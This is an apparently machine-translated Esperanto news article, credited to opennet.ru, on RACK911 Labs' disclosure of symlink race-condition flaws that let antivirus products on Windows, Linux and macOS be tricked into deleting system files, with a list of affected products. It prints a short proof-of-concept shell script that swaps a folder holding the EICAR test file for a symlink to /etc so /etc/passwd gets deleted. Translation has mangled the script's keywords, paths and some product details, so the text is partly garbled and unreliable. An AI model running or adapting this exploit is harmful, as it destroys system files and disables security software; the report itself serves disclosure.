Esploristoj de RACK911 Labs ke preskaŭ ĉiuj antivirusaj pakaĵoj por Vindozo, Linukso kaj macOS estis vundeblaj al atakoj manipulantaj raskondiĉojn dum la forigo de dosieroj en kiuj malbonvaro estis detektita.
Por fari atakon, vi devas alŝuti dosieron, kiun la antiviruso rekonas kiel malica (ekzemple, vi povas uzi testan subskribon), kaj post certa tempo, post kiam la antiviruso detektas la malican dosieron, sed tuj antaŭ voki la funkcion. por forigi ĝin, anstataŭigu la dosierujon per la dosiero per simbola ligilo. En Vindozo, por atingi la saman efikon, dosieruja anstataŭigo estas farita uzante dosierujan krucvojon. La problemo estas, ke preskaŭ ĉiuj antivirusoj ne ĝuste kontrolis simbolajn ligilojn kaj, kredante, ke ili forigas malican dosieron, forigis la dosieron en la dosierujo, al kiu indikas la simbola ligo.
En Linukso kaj macOS montriĝas kiel tiamaniere senprivilegia uzanto povas forigi /etc/passwd aŭ ajnan alian sistemdosieron, kaj en Vindozo la DDL-bibliotekon de la antiviruso mem por bloki ĝian laboron (en Vindozo la atako estas limigita nur al forigo dosieroj kiuj ne estas nuntempe uzataj de aliaj aplikoj). Ekzemple, atakanto povas krei "exploit" dosierujon kaj alŝuti la EpSecApiLib.dll dosieron kun testa virussignaturo en ĝin, kaj poste anstataŭigi la "exploit" dosierujon per la ligilo "C:\Program Files (x86)\McAfee\ Endpoint Security\Endpoint Security” antaŭ ol forigi ĝin Platformo”, kio kondukos al la forigo de la biblioteko EpSecApiLib.dll el la kontraŭvirusa katalogo. En Linukso kaj macos, simila lertaĵo povas esti farita anstataŭigante la dosierujon per la ligilo "/etc".
#! / bin / sh
rm -rf /home/user/exploit ; mkdir /home/user/exploit/
wget -q https://www.eicar.org/download/eicar.com.txt -O /home/user/exploit/passwd
dum inotifywait -m “/hejmo/uzanto/ekspluato/passwd” | grep -m 5 "Malfermu"
do
rm -rf /home/user/exploit ; ln -s /etc /home/user/exploit
farita
Krome, multaj kontraŭvirusaj programoj por Linukso kaj macOS estis trovitaj uzi antaŭvideblajn dosiernomojn kiam ili laboras kun provizoraj dosieroj en la dosierujoj /tmp kaj /private/tmp, kiuj povus esti uzataj por pligrandigi privilegiojn al la radika uzanto.
Nuntempe, la problemoj jam estis solvitaj de plej multaj provizantoj, sed estas rimarkinde, ke la unuaj sciigoj pri la problemo estis senditaj al fabrikantoj en la aŭtuno de 2018. Kvankam ne ĉiuj vendistoj publikigis ĝisdatigojn, ili ricevis almenaŭ 6 monatojn por fliki, kaj RACK911 Labs kredas, ke nun estas libera malkaŝi la vundeblecojn. Oni rimarkas, ke RACK911 Labs delonge laboras pri identigado de vundeblecoj, sed ĝi ne atendis, ke estus tiel malfacile labori kun kolegoj de la antivirusa industrio pro malfruoj en publikigado de ĝisdatigoj kaj ignorado de la bezono urĝe ripari sekurecon. problemoj.
Trafitaj produktoj (la senpaga antivirusa pakaĵo ClamAV ne estas listigita):
- linux
- BitDefender GravityZone
- Komoda Finpunkta Sekureco
- Sekureco de Eset-Dosiera Servilo
- F-Sekura Linukso-Sekureco
- Kaspersy Endpoint Security
- McAfee Endpoint Security
- Anti-Viruso de Sophos por Linukso
- fenestroj
- Avast Senpaga Kontraŭ-Viruso
- Avira Senpaga Kontraŭ-Viruso
- BitDefender GravityZone
- Komoda Finpunkta Sekureco
- F-Sekura Komputila Protekto
- FireEye Endpoint Security
- Interkapti X (Sophos)
- Kaspersky Endpoint Security
- Malwarebytes por Vindozo
- McAfee Endpoint Security
- Panda kupolo
- Webroot Sekura Ie ajn
- MacOS
- AVG
- Tuta Sekureco de BitDefender
- Eset Cibera Sekureco
- Kaspersky Interreta Sekureco
- McAfee Total Protection
- Microsoft Defender (BETA)
- Norton Sekureco
- Sophos Home
- Webroot Sekura Ie ajn
fonto: opennet.ru